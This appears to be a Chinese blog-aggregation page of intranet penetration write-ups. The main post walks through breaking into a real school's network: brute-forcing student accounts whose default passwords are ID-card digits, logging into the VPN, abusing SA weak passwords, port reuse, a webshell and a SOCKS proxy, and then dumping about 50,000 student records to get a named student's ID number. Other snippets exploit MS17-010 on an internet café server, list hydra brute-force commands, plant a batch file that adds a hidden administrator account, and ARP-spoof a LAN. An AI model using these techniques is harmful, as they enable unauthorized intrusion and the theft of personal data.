精华内容
下载资源
问答
  • 内网渗透实战技巧

    万次阅读 多人点赞 2019-12-13 15:34:03
    目录 拿下Web服务器 phpmyadmin后台getshell 后渗透第一步 派生CobaltStrike权限 获得System权限 ...内网主机信息收集 ...内网存活主机探测 ...内网横向渗透攻击技巧 MS17-010 CVE-2019-0708 pse...
    展开全文
  • QQ 1274510382 Wechat JNZ_aming 商业联盟 QQ群538250800 技术搞事 QQ群599020441 解决方案 QQ群152889761 ...内网资产嗅探 通过谷歌语法搜索该学校的学号 通过收集的学号,可以生成学号字典去爆破弱口令用..
    • 内网资产嗅探
      通过谷歌语法搜索该学校的学号
      通过收集的学号,可以生成学号字典去爆破弱口令用户
      获得了该校的学号格式
      在这里插入图片描述
      以下获取到
      默认的密码为
      身份证号的某段

    如何获取学号对应的身份证号码。
    在这里插入图片描述
    弱口令爆破

    通过上述获取到的学号生成字典,找到一处无验证码的学生系统进行爆破。

    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    如上成功爆破出尾数50的学号存在弱口令,
    通过弱口令可以登录该系统,
    登录后可以获取到该学生的身份证号码。

    此时,我们掌握了一个学号、姓名及身份证号,如果时间足够可以多去爆破几个。

    通过对该学校网站继续浏览,发现网站存在VPN系统,此处为突破口。

    内网资产嗅探

    通过上述获取到的学号+身份证后6位成功登录VPN系统,
    若登录不成功,则可以多爆破几个学号,

    尝试通过他们的身份证号进行登录,总有学生没有改默认密码的。

    在这里插入图片描述
    在这里插入图片描述
    如上成功登录VPN系统,进入学校内网。
    通过对内网的资产进行了大概的浏览及信息收集,发现存在以下IP段:

    192.168.25x.0

    192.168.4.0

    192.168.5.0

    扫描该网段开放WEB服务的服务器,
    同时后台扫描SQLServer及MySQL的弱口令。
    如下,内网还是存在很多的网站服务器。

    在这里插入图片描述
    通过对几个网段的Web系统的逐个浏览测试,发现主要存在以下漏洞
    在线考试管理系统存在SQL注入
    在这里插入图片描述
    抓包使用Sqlmap进行测试,一片红证明存在安全防护软件
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    资产管理系统存在SQL注入---->用户名处加单引号报错
    在这里插入图片描述
    在这里插入图片描述

    抓包使用Sqlmap进行测试
    在这里插入图片描述
    在这里插入图片描述
    同样抓包使用Sqlmap进行测试,但此处未被拦截。

    分析后发现该站点和上面站点不是一个网段,
    考试管理系统的是192.168.25x.0网段,而当前系统是192.168.4.0网段,
    可能是WAF的部署位置缺陷导致
    未防护到192.168.4.0网段。推测其大概网络拓扑图如下:

    在这里插入图片描述
    然当前注入点为SA权限,但不支持os-shell
    也未找到后台管理页面,且该系统很大可能不存在我们需要的信息。此处暂且先放一边

    后台弱口令

    发现一系统后台弱口令,成功登录后,并未有可以利用的功能点,且该站点有WAF进行防护。

    在这里插入图片描述
    服务扫描那一块已经扫描完成,扫到存在sa弱口令的服务
    SA弱口令

    如下,发现两台存在弱口令的服务器,
    且为192.168.25x.0网段。可以通过获取该服务器权限建立代理,
    然后去跑同网段考试系统的注入点,
    即可绕过WAF的防护,进而可获取数据库的信息

    在这里插入图片描述
    通过SQL工具连接后可以执行cmd,且当前权限为system权限
    在这里插入图片描述
    通过以下命令查找RDP服务的端口号

    tasklist/svc | find “TermService”

    netstat-nao | find “3220”

    发现当前RDP服务的端口号为8080
    在这里插入图片描述在这里插入图片描述

    在这里插入图片描述
    直接远程内网IP:8080,
    提示访问拒绝,表示VPN并未对外开放8080端口的访问。
    本想通过reGeorg脚本建立代理,但是80端口访问为报错,
    测试默认网站路径写入文件也404。
    测试本服务器为纯内网环境,不可访问互联网。

    端口复用及Socks代理

    通过对当前环境的分析,
    目前已经获取了25x的服务器的system权限cmd,
    想通过这台服务器建立代理,及登录服务器,在服务器上进行同网段的扫描探测,以此来绕过安全设备的防护。

    1、端口复用

    但当前是通过VPN连接到内网,
    且VPN仅对外开放了某些特定端口。
    此时我首先想到的是利用端口复用,
    正好当前的80端口的网站为报错页面,于是上传了利用工具。
    在这里插入图片描述在目标服务器上执行以下两条命令,此时相当于把本地的8080端口映射到80端口上。

    c:\wmpub\drivers.exe

    c:\wmpub\Changeport.exelocalhost 8080

    执行上述两条命令后,在本地nc目标IP80

    发送chkroot2007

    即开启端口复用,80端口的web服务会无法访问。

    在这里插入图片描述
    此时远程目标IP:80端口,即可访问服务器RDP
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    成功登录该服务器,通过该服务器即可当跳板登录内网更多的服务器,且可以对内网进行扫描

    在这里插入图片描述
    测试过程中发现端口复用并不稳定,不时就会断开,有可能是安全设备防护的原因
    对目标IP进行了全端口扫描,看看开放了哪些端口,扫描后发现被封了访问20多分钟。
    待解封后对端口逐个访问测试,发现存在9527存在web服务。
    在这里插入图片描述
    在这里插入图片描述
    此时需要找网站的物理路径写shell,以下两种方式即可:
    dirf:\2013103011494215.jpg /s

    typeC:\WINDOWS\system32\inetsrv\MetaBase.xml | findstr “Path”

    在这里插入图片描述
    找到路径后写入菜刀一句话shell

    在这里插入图片描述
    连接被重置证明存在安全设备,直接上传reGeorg代理脚本访问也是连接被重置。
    此处用到神器冰蝎,上传后成功连接。在这里插入图片描述

    在这里插入图片描述
    开始Socks代理

    开启Socks代理,sqlmap挂上代理进行考试系统注入测试

    在这里插入图片描述
    sqlmap.py–proxy=socks5://192.168.0.110:10086

    在这里插入图片描述
    如上没有报一片红,当前注入点权限为root,绕过了安全设备的防护
    在这里插入图片描述
    学生信息获取
    通过对数据库的浏览,发现存在member表,
    且数量为近5w,可以估计此约为全校学生信息,包含学号,姓名,身份证号等。

    在这里插入图片描述
    通过以下SQL语句即可获取刘书源的信息:

    selectusername,name,idcard from user_data where name=‘刘书源’;

    在这里插入图片描述
    即可获取刘书源的学号及身份证号码,通过身份证号码后六位即可登录大部分系统。
    在这里插入图片描述
    在这里插入图片描述
    达成此次测试的目的,成功获取刘书源的相关信息。

    通过爆破教师弱口令,登录门户系统进行测试。在这里插入图片描述在这里插入图片描述OA系统
    在这里插入图片描述

    教学平台
    在这里插入图片描述
    科研系统
    在这里插入图片描述
    财务系统
    在这里插入图片描述
    资产管理系统

    在这里插入图片描述
    抓取已经获取服务器的账号密码,收集服务器的数据库相关信息等继续进行横向渗透测试


    每天整理工具下载 地址

    内网资产扫描
    https://nmap.org/download.html
    Netbios协议探测 nmap -sU --script nbstat.nse -p137 172.16.80.0/21 -T4
    可以获得内网主机的主机名和MAC地址等信息。

    存活主机
    http://www.unixwiz.net/tools/nbtscan.html#download
    nbtscan-1.0.35.exe -m 172.16.80.0/24
    在这里插入图片描述

    ICMP协议探测 for /l %i in (1,1,255) do @ ping 172.16.80.%i -w 1 -n 1|find /i “ttl=”

     # nmap -sn -PE -T4 172.16.80.0/24    # 扫描
    # nmap -sn -PE -T4 172.16.80.0/24 | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'  # 提取ip地址
    

    它是TCP/IP协议族的一个子协议,
    用于在IP主机、路由器之间传递控制消息。
    控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。
    这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。
    在这里插入图片描述
    写入文件,写入C盘需要管理员权限,可使用管理员权限运行,或者切换盘符,内网存活主机保存在b.txt中。

     E:\Tools>@for /l %i in (1,1,255) do @ping -n 1 -w 40 172.16.80.%i & if errorlevel 1 (echo 172.16.80.%i>>./a.txt) else (echo 172.16.80.%i >>./b.txt)
    

    在这里插入图片描述

    利用
    https://windows.metasploit.com/metasploitframework-latest.msi
    msf5 > use auxiliary/scanner/netbios/nbname

    展开全文
  • 时隔这么久,读书也读了,考试也考完了。开始接受别人给我一次实战的任务。--记一次学习不久的实战,以后...让我们开始吧1、渗透环境配置需要材料有: pentestbox2、存活ip寻找。nmap -sP 192.168.0.0/24看着这些...

    时隔这么久,读书也读了,考试也考完了。开始接受别人给我一次实战的任务。

    --记一次学习不久的实战,以后看到可能会笑自己

    轻喷有问题可以留言给我。谢谢

    这次选在了离我家比较近的网吧。

    每次上网完回家身上都是一股烟味,点比较烦。所以才会想来这里。

    让我们开始吧

    1、渗透环境配置

    需要材料有:

                     pentestbox

    2、存活ip寻找。

    nmap -sP 192.168.0.0/24


    看着这些ip是有够烦的。



    一个个ip看完后


    192.168.0.250这个ip有点嫌疑。

    好家伙是一个服务器系统版本为2008

    我们开一下msf看看。



    我们用一下扫描模块试试

    use auxiliary/scanner/smb/smb_ms17_010


    ohhhhhhhhhh

    存在ms17-010

    让我们进行下一步操作。

    use exploit/windows/smb/ms17_010_psexec

    set rhost 192.168.0.250

    run


    开心的run后发现我们获得了一个meterpreter会话。

    乱码后我们还是用sysinfo吧。


    至此,一次考验自己的小小测试到此结束。还是个服务器。


                                                                                                                                           不忘初心,方能始终。 

    我是joeboom我们下次再见(不知道什么时候)希望不会被网吧老板打死。

    展开全文
  • 下面开始内网渗透测试 实验环境:VMware中的两台xp系统(SP3),hydra爆破工具 1、破解ssh: hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ...

    cmd命令
    color [选项] 改变控制台颜色
    在这里插入图片描述
    cls :清空命令
    md 创建目录
    rd 删除目录
    type(start) 文件名 打开文件

    死亡之ping

    ping -t -l 65500 IP      65500 表示数据长度上限,-t 表示不停地ping目标地址,这种攻击主要是由于单个包的长度超过了IP协议规范所规定的包长度
    

    在这里插入图片描述

    ipconfig \all    详细查看IP信息
    ipconfig \release     释放当前的IP
    ipconfig \renew     重新获取IP
    systeminfo       查看系统信息
    

    在这里插入图片描述

    arp -a
    

    可以显示网关的IP和MAC ,用于查看高速缓存中的所有项目,可以用来查看地址解析表的,还有可以查看所有连接了我的计算机,显示对方IP和MAC地址。

    net view   查看局域网内其他计算机名
    shutdown -s -t 180 -c “提示信息”     180秒后关机,并弹出提示信息。
    shutdown -a  取消180秒的关机
    

    创建文件
    在这里插入图片描述

    copy con F:\123.txt   
    ctrl+z  回车 退出
    del 文件名   删除文件
    
    netstat -a  查看开启哪些端口
    netstat -n   查看端口的网络连接情况
    netstat -v 查看正在进行的情况
    

    在这里插入图片描述

    windows xp系统渗透测试一个小实战

    一些命令:

    net use k: \\192.168.x.x\c$   将192.168.x.x这台机子的c盘拿到本地映射成k盘
    net start 服务名   开启服务
    net stop 服务名  关闭服务
    net user 用户名 密码 /add    添加新用户
    net localgroup administrators 用户 /add  把普通用户添加到管理员组 (提权)
    net user 用户 /del
    net share 查看本地开启的共享 ,本地的各个盘默认开启共享
    net share c$ /del    删除c盘共享
    net user administrator 123  将管理员密码改为123
    

    在这里插入图片描述

    下面开始内网渗透测试

    实验环境:VMware中的两台xp系统(SP3),hydra爆破工具

    1、破解ssh: 
    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh 
    hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh 
    
    
    2、破解ftp: 
    hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV 
    hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV 
    
    
    3、get方式提交,破解web登录: 
    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/ 
    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
    
    
    4、post方式提交,破解web登录: 
    hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" 
    hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>" 
    (参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中 的内容是表示错误猜解的返回信息提示。) 
    
    
    5、破解https: 
    hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https 
    
    
    
    6、破解teamspeak: 
    hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak 
    
    
    
    7、破解cisco: 
    hydra -P pass.txt 10.36.16.18 cisco 
    hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable 
    
    
    
    8、破解smb: 
    hydra -l administrator -P pass.txt 10.36.16.18 smb 
    
    
    
    9、破解pop3: 
    hydra -l muts -P pass.txt my.pop3.mail pop3 
    
    
    
    10、破解rdp: 
    hydra ip rdp -l administrator -P pass.txt -V 
    
    
    
    11、破解http-proxy: 
    hydra -l admin -P pass.txt http-proxy://10.36.16.18 
    
    
    
    12、破解imap: 
    hydra -L user.txt -p secret 10.36.16.18 imap PLAIN 
    hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
    

    在这里插入图片描述
    windows xp :192.168.80.132
    xindows xp_2:192.168.80.133
    两台电脑再同一个局域网内,可以相互ping通
    在这里插入图片描述
    我现在用132去渗透133
    首先查看133主机名

    net view  查看同一个局域网内的所有主机
    

    在这里插入图片描述
    局域网内有3台主机,第一条是我真实电脑,第一台是132,第三台是133
    然后开始映射
    1.首先加入知道密码的情况下在132的命令行输入(因为有密码缓存,所有我这里直接映射成功,但是第一次需要密码和账号)
    在这里插入图片描述在这里插入图片描述
    看到映射成功,直接可以操作对方电脑的c盘

    2.假如不知道密码,可以用hydra加上密码字典来破解,关键看密码字典的好坏了。
    在这里插入图片描述
    从网上下载hydra的压缩包解压拷贝到132的c盘下,不用安装,进入hydra文件夹,建立一个字典文件pass.txt ,里面可以写上密码字典
    在这里插入图片描述
    在这里插入图片描述

    hydra.exe -l administrator -P pass.txt IP smb
    

    这样就可以知道密码了。
    这时可以映射对方的c盘到自己的本机了,这时可以建立一个自己的账户,以便以后长久控制。
    建立一个批处理文件(bat文件)
    在这里插入图片描述
    建立一个用户---->提权---->关机
    然后在把这个批处理文件通过映射的k盘拷贝到对方电脑的桌面,目的是让对方自己去双击文件运行,还可以放在对方电脑的启动项里。
    如下图,在133电脑双击批处理文件后
    在这里插入图片描述
    在这里插入图片描述
    系统多了一个用户cracer,这个cracer具有管理员权限,而且密码自己也知道,以后就可以长期控制对方电脑了

    展开全文
  • 内网渗透指南
  • 内网渗透指南

    2018-11-13 10:03:01
    内网渗透指南。获取目标的主机存活信息和端口开放信息后,就可以尝试分析目标的网络结构,安全防御策略。按照办公网和生产网分别说一下。
  • Kali Linux渗透测试实战

    热门讨论 2014-03-10 16:50:48
    Kali Linux渗透测试实战 如果您之前使用过或者了解BackTrack系列Linux的话,那么我只需要简单的说,Kali是BackTrack的升级换代产品, 从Kali开始,BackTrack将成为历史。如果您没接触过BackTrack也没关系,我们从头...
  • 内网渗透实战——AJP13服务漏洞

    千次阅读 2019-12-17 16:10:19
    QQ 1285575001 Wechat M010527 技术交流 QQ群599020441 ...通过学校内网的网站0/24 的存活主机刺探排查 学校用大把的银子来加固安全和 买大公司的软件 (所以尽量不跟大公司技术碰壁) ...
  • 外网打点发现web服务器有: DocCMS的sql需要url双重编码绕过,所以sqlmap要tamper: ...keyword=123" --tamper=chardoubleencode 代码审计之_doccms2016漏洞_whojoe的博客-CSDN博客 ...代码审计之DocCms漏洞分析-阿里...
  • 靶机IP:192.168.8.107 kali-ip :192.168.0.102 一、信息收集: 1.主机发现: netdiscover - r 192.168.0.0/24 //获取靶机IP 2.端口扫描: nmap -T4 p 192.168.0.107 //获取可以用端口信息 nmap -T4 -A -v 192....
  • 内网安全攻防-渗透测试指南
  • kali渗透测试实战操作

    千次阅读 2019-10-13 21:35:54
    Kali渗透测试复现所需环境 所需环境 Vmware Kali Linux(IP:192.168.145.128) Windows 7 or Windows 10 打开终端,输入msfconsole 然后生成一个木马代码如下 msfvenom -p windows/meterpreter/reverse_tcp LHOST=...
  • kali渗透实战02---获取内网QQ相册

    千次阅读 2019-04-01 08:27:10
    在kali渗透实战01我们说到了用 arpspoof -i 网卡 -t 目标IP 网关 这个命令能实现arp欺诈,但是我们明明是想实现arp欺诈但是却出现了断网的现象,我们需要的效果是目标IP的流量经过我的网卡,从网关出去 ip流量转发 echo...
  • kali渗透实战01--局域网断网攻击

    千次阅读 2019-03-31 20:01:23
    以前大学的时候就收到过arp欺骗,到现在没找打凶手,于是现在报复社会 这里用到Arpspoof Arpspoof -i 网卡 -t 目标IP 网关 kali:网卡 eth0 目标ip:192.168.1.100 网关:192.168.1.1 所以命令就是arpspoof -i eth0 ...
  • 一次实战环境横向内网渗透记录

    千次阅读 2019-07-08 11:32:11
    渗透背景: 某反病毒公司即将推出一种新的反病毒产品,已知该公司员工Molos的电脑中有该反病毒产品的相关信息,目标是将该文件取出并不被发现 .../内网渗透过程**/ 1.信息收集 通过nmap进行信息收...
  • 内网穿透-FRP实战

    2019-12-30 16:51:31
    本次使用工具推荐使用FRP(官网推荐看github上的开源链接https://github.com/fatedier/frp),下面是实战内容: 关于FRP的安装,自行google,无非就是下载,解压而已的操作,本次实验只是针对穿透到内网,方便外网...
  • 渗透测试实战第三版 中文,慢慢干活全部环境都在书里。
  • 前言上次记录过一篇提权到内网初探,但感觉收尾有些仓促,最近刚好遇到了很好的实战过程,故本篇为过程记录复现,着重围绕着目标进行测试。希望看完本篇能给您带来一些思路或启发。假设本次测试前提为...
  • 内网渗透之域渗透

    2021-06-01 08:46:43
    内网渗透之域渗透 文章目录内网渗透之域渗透0x01 环境介绍1.实验环境靶场2.域环境初始化3.Kali 环境准备0x02 WebLogic 漏洞利用并 getshell1.信息收集2.利用 CVE-2019-27250x03 域渗透-横向渗透获取域控最高权限1....
  • 而在内网渗透的过程中碰到这种情况,我们也可以借助上面内网传统的方式实现穿透防火墙的入站规则。因为防火墙通常只拦截了入站,没有拦截出站,那么我们可以让内网服务器主动出站(主动连接到黑客的服务器),与黑客...
  • 4.4 开启此机器的远程连接 //实战中可以没有这一步,看具体情况 4.5 扫描检测内网之中其他机器 4.6 使用msf将攻击机器增加到目标网络的路由内,并开启socks代理 4.7 使用hash传递进行内网横向移动攻击 ...
  • 内网安全攻防渗透测试实战指南
  • 包含一下几个方面 1.漏洞搜索与利用 2.后台Getshell上传技巧 3.系统信息收集 ... 5.内网--内网信息收集 ...6.内网攻击姿势--信息泄露 ...7.内网攻击姿势-MS08-067 ...11.域渗透-域成员信息收集 12.域管理密码获取。
  • 内网渗透综合实验 - 实验指导书,通过实验学习内网渗透的细节,掌握内网攻防的具体步骤,可以进行实战操作
  • 内网渗透环境搭建

    千次阅读 2020-06-11 16:05:28
    内网渗透 内网渗透测试,其实很大程度上是域渗透测试。 常见的内网环境一般是(Windows server2003-2019、Windows7) 内网搭建所需环境 Windows server 2012 R2 标准版 Windows server 2008 R2 标准版 Windows 7 ...
  • 提权与内网渗透

    千次阅读 2019-08-25 18:42:51
    提权实战 Udf(用户定义函数)提权 1.导出C:\windows\udf.dll Mof(托管对象格式)提权 在Kali Linux下 导入 c:\windows\system32\wbem\mof\ use exploit/windows/mysql/mysql_mof set password xxx set ...
  • ATT&CK实战系列一(内网渗透入门)

    千次阅读 2020-07-11 19:58:56
    done 1、搭建代理 发现目标后,为方便后续工具的使用,需要先搭建代理,将web服务器搭建成socks5代理服务器,内网渗透里先把网调通是最关键的,所以下面会多讲点代理的问题; (1)meterpreter搭建反向socks4代理 ...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 1,743
精华内容 697
关键字:

内网渗透实战